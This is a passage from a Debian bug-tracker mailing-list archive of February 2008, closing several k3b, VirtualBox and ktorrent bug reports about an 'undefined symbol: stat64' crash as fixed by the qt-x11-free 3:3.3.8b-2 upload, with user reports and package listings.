  to pool/main/q/qt-x11-free/libqt3-mt-sqlite_3.3.8b-2_amd64.deb
libqt3-mt_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt_3.3.8b-2_amd64.deb
qt-x11-free-dbg_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt-x11-free-dbg_3.3.8b-2_amd64.deb
qt-x11-free_3.3.8b-2.diff.gz
  to pool/main/q/qt-x11-free/qt-x11-free_3.3.8b-2.diff.gz
qt-x11-free_3.3.8b-2.dsc
  to pool/main/q/qt-x11-free/qt-x11-free_3.3.8b-2.dsc
qt3-apps-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-apps-dev_3.3.8b-2_amd64.deb
qt3-assistant_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-assistant_3.3.8b-2_amd64.deb
qt3-designer_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-designer_3.3.8b-2_amd64.deb
qt3-dev-tools-compat_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools-compat_3.3.8b-2_amd64.deb
qt3-dev-tools-embedded_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools-embedded_3.3.8b-2_amd64.deb
qt3-dev-tools_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools_3.3.8b-2_amd64.deb

Bug#465413: marked as done (Undefined symbol stat64 in libk3b.so.3)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 16:47:10 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465028: fixed in qt-x11-free 3:3.3.8b-2
has caused the Debian Bug report #465028,
regarding Undefined symbol stat64 in libk3b.so.3
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465028: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465028
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: k3b
Version: 1.0.4-6
Severity: normal


As soon as K3B reads the debian-40r2-i386-CD-1.iso image, it exits with:

k3b: symbol lookup error: /usr/lib/libk3b.so.3: undefined symbol: stat64

I'm not sure if this affects anyone else, so I'm reporting with a lame
Severity.

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)

Kernel: Linux 2.6.24-1-686 (SMP w/2 CPU cores)
Locale: LANG=en_ZA.UTF-8, LC_CTYPE=en_ZA.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages k3b depends on:
ii  cdparanoia   3.10+debian~pre0-6  audio extraction tool for sampling
ii  cdrdao   1:1.2.2-11  records CDs in Disk-At-Once (DAO) 
ii  genisoimage  9:1.1.6-1   Creates ISO-9660 CD-ROM filesystem
ii  k3b-data 1.0.4-6 A sophisticated KDE CD burning app
ii  kdelibs-data 4:3.5.8.dfsg.1-7core shared data for all KDE appli
ii  kdelibs4c2a  4:3.5.8.dfsg.1-7core libraries and binaries for al
ii  libacl1  2.2.45-1Access control list shared library
ii  libart-2.0-2 2.3.20-1Library of functions for 2D graphi
ii  libattr1 1:2.4.39-1  Extended attribute shared library
ii  libaudio21.9.1-1 Network Audio System - shared libr
ii  libc62.7-6   GNU C Library: Shared libraries
ii  libdbus-1-3  1.1.2-1 simple interprocess messaging syst
ii  libdbus-qt-1-1c2 0.62.git.20060814-2 simple interprocess messaging syst
ii  libdvdread3  0.9.7-6 library for reading DVDs
ii  libexpat11.95.8-4XML parsing C library - runtime li
ii  libfam0  2.7.0-13.1  Client library to control the FAM 
ii  libfontconfig1   2.5.0-2 generic font configuration library
ii  libfreetype6 2.3.5-1+b1  FreeType 2 font engine, shared lib
ii  libgcc1  1:4.3-20080202-1GCC support library
ii  libhal1  0.5.10-5Hardware Abstraction Layer - share
ii  libice6  2:1.0.4-1   X11 Inter-Client Exchange library
ii  libidn11 1.1-1   GNU libidn library, implementation
ii  libjpeg626b-14   The Independent JPEG Group's JPEG 
ii  libk3b3  1.0.4-6 The KDE cd burning application lib
ii  libmusicbrainz4c2a   2.1.5-1 Second generation incarnation of t
ii  libpng12-0   1.2.15~beta5-3  PNG library - runtime
ii  libqt3-mt3:3.3.8b-1  Qt GUI Library (Threaded runtime v
ii  libsm6   2:1.0.3-1+b1X11 Session Management library
ii  libstdc++6   4.3-20080202-1  The GNU Standard C++ Library v3
ii  libx11-6 2:1.0.3-7   X11 client-side library
ii  libxcursor1  1:1.1.9-1   X cursor management library
ii  libxext6 1:1.0.3-2   X11 miscellaneous extension librar
ii  libxft2  2.1.12-2FreeType-based font drawing librar
ii  libxi6   2:1.1.3-1   X11 Input extension library
ii  libxinerama1 1:1.0.2-1   X11 Xinerama extension library
ii  libxrandr2   2:1.2.2-1   X11 RandR extension library
ii  libxrender1  1:0.9.4-1   X Rendering Extension client libra
ii  libxt6   1:1.0.5-3   X11 toolkit intrinsics library
ii  wodim9:1.1.6-1   command line CD/DVD writing tool
ii  zlib1g   1:1.2.3.3.dfsg-11   compression library - runtime

Versions of packages k3b recommends:
ii  dvd+rw-tools7.0-9DVD+-RW/R tools
ii  kcontrol4:3.5.8.dfsg.1-7 control center for KDE
ii  kdebase-kio-plugins 4:3.5.8.dfsg.1-7 core I/O slaves for KDE
ii  vcdimager   0.7.23-4 A VideoCD (VCD) image mastering an

-- no debconf information



--- End Message ---
--- Begin Message ---
Source: qt-x11-free
Source-Version: 3:3.3.8b-2

We believe that the bug you reported is fixed 

Bug#465485: marked as done (virtualbox-ose: Fails to start)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 16:47:10 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465028: fixed in qt-x11-free 3:3.3.8b-2
has caused the Debian Bug report #465028,
regarding virtualbox-ose: Fails to start
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465028: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465028
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: virtualbox-ose
Version: 1.5.4-dfsg-4
Severity: grave
Justification: renders package unusable


Virtualbox fails to start (Exit 127) an prints

/usr/lib/virtualbox/VirtualBox: symbol lookup error:
/usr/lib/virtualbox/VirtualBox: undefined symbol: stat64

in one line.

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)

Kernel: Linux 2.6.24-1-686 (SMP w/1 CPU core)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages virtualbox-ose depends on:
ii  adduser 3.105add and remove users and groups
ii  debconf [debconf-2.0]   1.5.19   Debian configuration management sy
ii  libc6   2.7-6GNU C Library: Shared libraries
ii  libgcc1 1:4.3-20080202-1 GCC support library
ii  libgl1-mesa-glx [libgl1 7.0.2-4  A free implementation of the OpenG
ii  libglib2.0-02.14.6-1 The GLib library of C routines
ii  libidl0 0.8.9-0.1library for parsing CORBA IDL file
ii  libqt3-mt   3:3.3.8b-1   Qt GUI Library (Threaded runtime v
ii  libsdl1.2debian 1.2.13-2 Simple DirectMedia Layer
ii  libstdc++6  4.3-20080202-1   The GNU Standard C++ Library v3
ii  libx11-62:1.0.3-7X11 client-side library
ii  libxalan110 1.10-3.1 Provides XSLT support for applicat
ii  libxcursor1 1:1.1.9-1X cursor management library
ii  libxerces27 2.7.0-5  validating XML parser library for 
ii  libxext61:1.0.3-2X11 miscellaneous extension librar
ii  libxt6  1:1.0.5-3X11 toolkit intrinsics library

Versions of packages virtualbox-ose recommends:
ii  virtualbox-ose-modul 2.6.24+1.5.4-dfsg-3 PC virtualization solution modules

-- debconf information:
  virtualbox-ose/upstream_version_change: false


--- End Message ---
--- Begin Message ---
Source: qt-x11-free
Source-Version: 3:3.3.8b-2

We believe that the bug you reported is fixed in the latest version of
qt-x11-free, which is due to be installed in the Debian FTP archive:

libqt3-compat-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-compat-headers_3.3.8b-2_amd64.deb
libqt3-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-headers_3.3.8b-2_amd64.deb
libqt3-i18n_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/libqt3-i18n_3.3.8b-2_all.deb
libqt3-mt-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-dev_3.3.8b-2_amd64.deb
libqt3-mt-ibase_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-ibase_3.3.8b-2_amd64.deb
libqt3-mt-mysql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-mysql_3.3.8b-2_amd64.deb
libqt3-mt-odbc_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-odbc_3.3.8b-2_amd64.deb
libqt3-mt-psql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-psql_3.3.8b-2_amd64.deb
libqt3-mt-sqlite_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-sqlite_3.3.8b-2_amd64.deb
libqt3-mt_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt_3.3.8b-2_amd64.deb
qt-x11-free-dbg_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt-x11-free-dbg_3.3.8b-2_amd64.deb
qt-x11-free_3.3.8b-2.diff.gz
  to pool/main/q/qt-x11-free/qt-x11-free_3.3.8b-2.diff.gz
qt-x11-free_3.3.8b-2.dsc
  to pool/main/q/qt-x11-free/qt-x11-free_3.3.8b-2.dsc
qt3-apps-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-apps-dev_3.3.8b-2_amd64.deb
qt3-assistant_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-assistant_3.3.8b-2_amd64.deb
qt3-designer_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-designer_3.3.8b-2_amd64.deb
qt3-dev-tools-compat_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools-compat_3.3.8b-2_amd64.deb
qt3-dev-tools-embedded_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools-embedded_3.3.8b-2_amd64.deb
qt3-dev-tools_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools_3.3.8b-2_amd64.deb
qt3-doc_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/qt3-doc_3.3.8b-2_all.deb
qt3-examples_3.3.8

Bug#465839: marked as done (symbol lookup error when starting ktorrent)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 16:47:10 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465028: fixed in qt-x11-free 3:3.3.8b-2
has caused the Debian Bug report #465028,
regarding symbol lookup error when starting ktorrent
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465028: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465028
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---

Package: ktorrent
Version: 2.2.5.dfsg.1-1
Severity: serious

--- Please enter the report below this line. ---
When I try to open ktorrent I get this

ktorrent: symbol lookup error: /usr/lib/libktorrent-2.2.5.so: undefined symbol: 
fstat64


Then ktorrent closes.  If I remove my .kde/share/apps/ktorrent folder, then 
ktorrent opens but as soon as I try to open a .torrent file it crashes again.


This might be related to konqueror bug #465253 which I am also experiencing.


--- System information. ---
Architecture: i386
Kernel:   Linux 2.6.24-1-686

Debian Release: lenny/sid
  700 unstablewww.debian-multimedia.org
  700 unstableftp.us.debian.org
  650 testing security.debian.org
  650 testing ftp.us.debian.org
  600 stable  security.debian.org
  600 stable  ftp.us.debian.org

--- Package information. ---
Depends  (Version) | Installed
==-+-==
kdelibs4c2a  (>= 4:3.5.8.dfsg.1-5) | 4:3.5.8.dfsg.1-7
libavahi-client3   (>= 0.6.13) | 0.6.22-2
libavahi-common3   (>= 0.6.10) | 0.6.22-2
libavahi-qt3-1  (>= 0.6.0) | 0.6.22-2
libc6   (>= 2.7-1) | 2.7-8
libgcc1(>= 1:4.1.1-21) | 1:4.3-20080202-1
libgeoip1  | 1.4.4.dfsg-1
libgmp3c2  | 2:4.2.2+dfsg-2
libqt3-mt (>= 3:3.3.7) | 3:3.3.8b-1
libstdc++6(>= 4.2.1-4) | 4.3-20080202-1



--- End Message ---
--- Begin Message ---
Source: qt-x11-free
Source-Version: 3:3.3.8b-2

We believe that the bug you reported is fixed in the latest version of
qt-x11-free, which is due to be installed in the Debian FTP archive:

libqt3-compat-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-compat-headers_3.3.8b-2_amd64.deb
libqt3-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-headers_3.3.8b-2_amd64.deb
libqt3-i18n_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/libqt3-i18n_3.3.8b-2_all.deb
libqt3-mt-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-dev_3.3.8b-2_amd64.deb
libqt3-mt-ibase_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-ibase_3.3.8b-2_amd64.deb
libqt3-mt-mysql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-mysql_3.3.8b-2_amd64.deb
libqt3-mt-odbc_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-odbc_3.3.8b-2_amd64.deb
libqt3-mt-psql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-psql_3.3.8b-2_amd64.deb
libqt3-mt-sqlite_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-sqlite_3.3.8b-2_amd64.deb
libqt3-mt_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt_3.3.8b-2_amd64.deb
qt-x11-free-dbg_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt-x11-free-dbg_3.3.8b-2_amd64.deb
qt-x11-free_3.3.8b-2.diff.gz
  to pool/main/q/qt-x11-free/qt-x11-free_3.3.8b-2.diff.gz
qt-x11-free_3.3.8b-2.dsc
  to pool/main/q/qt-x11-free/qt-x11-free_3.3.8b-2.dsc
qt3-apps-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-apps-dev_3.3.8b-2_amd64.deb
qt3-assistant_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-assistant_3.3.8b-2_amd64.deb
qt3-designer_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-designer_3.3.8b-2_amd64.deb
qt3-dev-tools-compat_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools-compat_3.3.8b-2_amd64.deb
qt3-dev-tools-embedded_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools-embedded_3.3.8b-2_amd64.deb
qt3-dev-tools_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools_3.3.8b-2_amd64.deb
qt3-doc_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/qt3-doc_3.3.8b-2_all.deb
qt3-examples_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/qt3-examples_3.3.8b-2_all.deb
qt3-linguist_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-linguist_3.3.8b-2_amd64.deb
qt3-qtconfig_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-qtconfig_3.3.8b-2_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them

Bug#465765: marked as done (k3b: symbol lookup error: /usr/lib/libk3b.so.3: undefined symbol: stat64)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 16:47:10 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465028: fixed in qt-x11-free 3:3.3.8b-2
has caused the Debian Bug report #465028,
regarding k3b: symbol lookup error: /usr/lib/libk3b.so.3: undefined symbol: 
stat64
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465028: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465028
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: k3b
Version: 1.0.4-6
Severity: grave
Justification: renders package unusable

Adding files to a project ends with an error and the following message:

k3b: symbol lookup error: /usr/lib/libk3b.so.3: undefined symbol: stat64


This error may be ralated to libc6. There was an libc6 update these days
but I checked also the libc6 2.7-6 from lenny with the same result.
k3b 1.0.4-3 (lenny) worked without any problems...


Please fix this as soon as possible ...



-- System Information:
Debian Release: lenny/sid
  APT prefers oldstable
  APT policy: (500, 'oldstable'), (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.23.8 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages k3b depends on:
ii  cdparanoia   3.10+debian~pre0-6  audio extraction tool for sampling
ii  cdrdao   1:1.2.2-11  records CDs in Disk-At-Once (DAO) 
ii  genisoimage  9:1.1.6-1   Creates ISO-9660 CD-ROM filesystem
ii  k3b-data 1.0.4-6 A sophisticated KDE CD burning app
ii  kdelibs-data 4:3.5.8.dfsg.1-7core shared data for all KDE appli
ii  kdelibs4c2a  4:3.5.8.dfsg.1-7core libraries and binaries for al
ii  libacl1  2.2.45-1Access control list shared library
ii  libart-2.0-2 2.3.20-1Library of functions for 2D graphi
ii  libattr1 1:2.4.39-1  Extended attribute shared library
ii  libaudio21.9.1-1 Network Audio System - shared libr
ii  libc62.7-8   GNU C Library: Shared libraries
ii  libdbus-1-3  1.1.2-1 simple interprocess messaging syst
ii  libdbus-qt-1-1c2 0.62.git.20060814-2 simple interprocess messaging syst
ii  libdvdread3  0.9.7-6 library for reading DVDs
ii  libexpat11.95.8-4XML parsing C library - runtime li
ii  libfontconfig1   2.5.0-2 generic font configuration library
ii  libfreetype6 2.3.5-1+b1  FreeType 2 font engine, shared lib
ii  libgamin0 [libfam0]  0.1.9-2 Client library for the gamin file 
ii  libgcc1  1:4.3-20080202-1GCC support library
ii  libhal1  0.5.10-5Hardware Abstraction Layer - share
ii  libice6  2:1.0.4-1   X11 Inter-Client Exchange library
ii  libidn11 1.4-1   GNU libidn library, implementation
ii  libjpeg626b-14   The Independent JPEG Group's JPEG 
ii  libk3b3  1.0.4-6 The KDE cd burning application lib
ii  libmusicbrainz4c2a   2.1.5-1 Second generation incarnation of t
ii  libpng12-0   1.2.15~beta5-3  PNG library - runtime
ii  libqt3-mt3:3.3.8b-1  Qt GUI Library (Threaded runtime v
ii  libsm6   2:1.0.3-1+b1X11 Session Management library
ii  libstdc++6   4.3-20080202-1  The GNU Standard C++ Library v3
ii  libx11-6 2:1.0.3-7   X11 client-side library
ii  libxcursor1  1:1.1.9-1   X cursor management library
ii  libxext6 1:1.0.3-2   X11 miscellaneous extension librar
ii  libxft2  2.1.12-2FreeType-based font drawing librar
ii  libxi6   2:1.1.3-1   X11 Input extension library
ii  libxinerama1 1:1.0.2-1   X11 Xinerama extension library
ii  libxrandr2   2:1.2.2-1   X11 RandR extension library
ii  libxrender1  1:0.9.4-1   X Rendering Extension client libra
ii  libxt6   1:1.0.5-3   X11 toolkit intrinsics library
ii  wodim9:1.1.6-1   command line CD/DVD writing tool
ii  zlib1g   1:1.2.3.3.dfsg-11   compression library - runtime

Versions of packages k3b recommends:
ii  dvd+rw-tools7.0-9DVD+-RW/R tools
ii  kcontrol4:3.5.8.dfsg.1-7 control center for KDE
pn  kdebase-kio-plugins(no des

Bug#465969: marked as done (virtualbox-ose: stat 64 error on start)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 16:47:10 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465028: fixed in qt-x11-free 3:3.3.8b-2
has caused the Debian Bug report #465028,
regarding virtualbox-ose: stat 64 error on start
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465028: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465028
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: virtualbox-ose
Version: 1.5.4-dfsg-4
Severity: grave
Justification: renders package unusable


[EMAIL PROTECTED]:/lib/modules/2.6.24-1-686/misc$ virtualbox
/usr/lib/virtualbox/VirtualBox: symbol lookup error: 
/usr/lib/virtualbox/VirtualBox: undefined symbol: stat64
[EMAIL PROTECTED]:/lib/modules/2.6.24-1-686/misc$   

I get this error whether or not I have used the virtualbox-ose-modules packages 
or built from source.


-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)

Kernel: Linux 2.6.24-1-686 (SMP w/2 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash

Versions of packages virtualbox-ose depends on:
ii  adduser 3.105add and remove users and groups
ii  debconf [debconf-2.0]   1.5.19   Debian configuration management sy
ii  libc6   2.7-8GNU C Library: Shared libraries
ii  libgcc1 1:4.3-20080202-1 GCC support library
ii  libgl1-mesa-glx [libgl1 7.0.2-4  A free implementation of the OpenG
ii  libglib2.0-02.14.6-1 The GLib library of C routines
ii  libidl0 0.8.9-0.1library for parsing CORBA IDL file
ii  libqt3-mt   3:3.3.8b-1   Qt GUI Library (Threaded runtime v
ii  libsdl1.2debian 1.2.13-2 Simple DirectMedia Layer
ii  libstdc++6  4.3-20080202-1   The GNU Standard C++ Library v3
ii  libx11-62:1.0.3-7X11 client-side library
ii  libxalan110 1.10-3.1 Provides XSLT support for applicat
ii  libxcursor1 1:1.1.9-1X cursor management library
ii  libxerces27 2.7.0-5  validating XML parser library for 
ii  libxext61:1.0.3-2X11 miscellaneous extension librar
ii  libxt6  1:1.0.5-3X11 toolkit intrinsics library

Versions of packages virtualbox-ose recommends:
ii  virtualbox-ose-mod 1.5.4-dfsg-4+2.6.24-4 VirtualBox modules for Linux (kern

-- debconf information:
  virtualbox-ose/upstream_version_change: false


--- End Message ---
--- Begin Message ---
Source: qt-x11-free
Source-Version: 3:3.3.8b-2

We believe that the bug you reported is fixed in the latest version of
qt-x11-free, which is due to be installed in the Debian FTP archive:

libqt3-compat-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-compat-headers_3.3.8b-2_amd64.deb
libqt3-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-headers_3.3.8b-2_amd64.deb
libqt3-i18n_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/libqt3-i18n_3.3.8b-2_all.deb
libqt3-mt-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-dev_3.3.8b-2_amd64.deb
libqt3-mt-ibase_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-ibase_3.3.8b-2_amd64.deb
libqt3-mt-mysql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-mysql_3.3.8b-2_amd64.deb
libqt3-mt-odbc_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-odbc_3.3.8b-2_amd64.deb
libqt3-mt-psql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-psql_3.3.8b-2_amd64.deb
libqt3-mt-sqlite_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-sqlite_3.3.8b-2_amd64.deb
libqt3-mt_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt_3.3.8b-2_amd64.deb
qt-x11-free-dbg_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt-x11-free-dbg_3.3.8b-2_amd64.deb
qt-x11-free_3.3.8b-2.diff.gz
  to pool/main/q/qt-x11-free/qt-x11-free_3.3.8b-2.diff.gz
qt-x11-free_3.3.8b-2.dsc
  to pool/main/q/qt-x11-free/qt-x11-free_3.3.8b-2.dsc
qt3-apps-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-apps-dev_3.3.8b-2_amd64.deb
qt3-assistant_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-assistant_3.3.8b-2_amd64.deb
qt3-designer_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-designer_3.3.8b-2_amd64.deb
qt3-dev-tools-compat_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools-compat_3.3.8b-2_amd64.deb
qt3-dev-tools-embedded_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools-embedded_3.3.8b-2_amd64.deb
qt3-dev-tools_3.3.8b-2_amd64.deb

Bug#465792: marked as done (virtualbox-ose: cannot start virtualbox due to a undefined symbol "stat64" on i386)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 16:47:10 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465028: fixed in qt-x11-free 3:3.3.8b-2
has caused the Debian Bug report #465028,
regarding virtualbox-ose: cannot start virtualbox due to a undefined symbol 
"stat64" on i386
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465028: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465028
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: virtualbox-ose
Version: 1.5.4-dfsg-4
Severity: important

Hi,

I use VirtualBox sporadically and today, I'm not able to launch it
anymore. I get this error :

$ virtualbox
/usr/lib/virtualbox/VirtualBox: symbol lookup error: 
/usr/lib/virtualbox/VirtualBox: undefined symbol: stat64
$

I tried to remove every package related to VirtualBox (and I hit #462885
btw), but it changes nothing. I tried to remove my ~/.VirtualBox folder, 
without success.

I don't know if it's relevant or not, but I'm using a i386 (-686) kernel
on an Athlon64.

I get this error, vboxdrv module loaded or not (I get a warning if
vboxdrv is not loaded, but this is expected I guess).

Just ask if you want more informations.

Thanks,

 - Jonathan


-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'testing')
Architecture: i386 (i686)

Kernel: Linux 2.6.24-1-686 (SMP w/1 CPU core)
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/bash

Versions of packages virtualbox-ose depends on:
ii  adduser 3.105add and remove users and groups
ii  debconf [debconf-2.0]   1.5.19   Debian configuration management sy
ii  libc6   2.7-6GNU C Library: Shared libraries
ii  libgcc1 1:4.3-20080202-1 GCC support library
ii  libgl1-mesa-glx [libgl1 7.0.2-4  A free implementation of the OpenG
ii  libglib2.0-02.14.6-1 The GLib library of C routines
ii  libidl0 0.8.9-0.1library for parsing CORBA IDL file
ii  libqt3-mt   3:3.3.8b-1   Qt GUI Library (Threaded runtime v
ii  libsdl1.2debian 1.2.13-2 Simple DirectMedia Layer
ii  libstdc++6  4.3-20080202-1   The GNU Standard C++ Library v3
ii  libx11-62:1.0.3-7X11 client-side library
ii  libxalan110 1.10-3.1 Provides XSLT support for applicat
ii  libxcursor1 1:1.1.9-1X cursor management library
ii  libxerces27 2.7.0-5  validating XML parser library for 
ii  libxext61:1.0.3-2X11 miscellaneous extension librar
ii  libxt6  1:1.0.5-3X11 toolkit intrinsics library

Versions of packages virtualbox-ose recommends:
ii  virtualbox-ose-modul 2.6.24+1.5.4-dfsg-3 PC virtualization solution modules

-- debconf information:
  virtualbox-ose/upstream_version_change: false 


--- End Message ---
--- Begin Message ---
Source: qt-x11-free
Source-Version: 3:3.3.8b-2

We believe that the bug you reported is fixed in the latest version of
qt-x11-free, which is due to be installed in the Debian FTP archive:

libqt3-compat-headers_3.3.8b-2_amd64.deb
